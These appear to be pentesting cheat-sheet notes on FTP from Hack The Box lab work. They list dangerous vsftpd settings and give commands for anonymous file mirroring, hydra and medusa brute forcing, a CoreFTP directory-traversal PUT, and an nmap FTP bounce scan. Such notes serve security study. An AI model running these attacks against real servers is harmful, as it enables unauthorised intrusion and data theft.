# \[21] FTP

Default Configuration: */etc/vsftpd.conf*

Deny users file: /etc/ftpusers

Dangerous Configuration:

| **Setting**                    | **Description**                                                                    |   |
| ------------------------------ | ---------------------------------------------------------------------------------- | - |
| `anonymous_enable=YES`         | Allowing anonymous login?                                                          |   |
| `anon_upload_enable=YES`       | Allowing anonymous to upload files?                                                |   |
| `anon_mkdir_write_enable=YES`  | Allowing anonymous to create new directories?                                      |   |
| `no_anon_password=YES`         | Do not ask anonymous for password?                                                 |   |
| `anon_root=/home/username/ftp` | Directory for anonymous.                                                           |   |
| `write_enable=YES`             | Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE? |   |

```bash
#Connect to FTP Server
Intrusionz3r0X@htb[/htb]$ ftp 10.129.14.136
Intrusionz3r0X@htb[/htb]$ nc -nv 10.129.14.136 21
Intrusionz3r0X@htb[/htb]$ telnet 10.129.14.136 21
# Connect to FTP with TLS/SSL encryption
Intrusionz3r0X@htb[/htb]$ openssl s_client -connect 10.129.14.136:21 -starttls ftp

#Download All Available Files
Intrusionz3r0X@htb[/htb]$ wget -m --no-passive ftp://anonymous:anonymous@10.129.14.136
#Nmap Enumeration
Intrusionz3r0X@htb[/htb]$ sudo nmap -sV -p21 -sC -A 10.129.14.136 #--script-trace

#Brute Force
Intrusionz3r0X@htb[/htb]$ medusa -U users.list  -P passwords.list  -h 10.129.23.100 -M ftp -t 30 -F #-n 2121
Intrusionz3r0X@htb[/htb]$ hydra -L users.list -P passwords.list ftp://10.129.202.221 -t 64

#CoreFTP Server build 725 - Directory Traversal (Authenticated)
Intrusionz3r0X@htb[/htb]$ curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
```

**FTP Bounce Attack**

An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. The attacker uses a `PORT` command to trick the FTP connection into running commands and getting information from a device other than the intended server.

```powershell
#FTP Bounce Attack
Intrusionz3r0X@htb[/htb]$ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2
```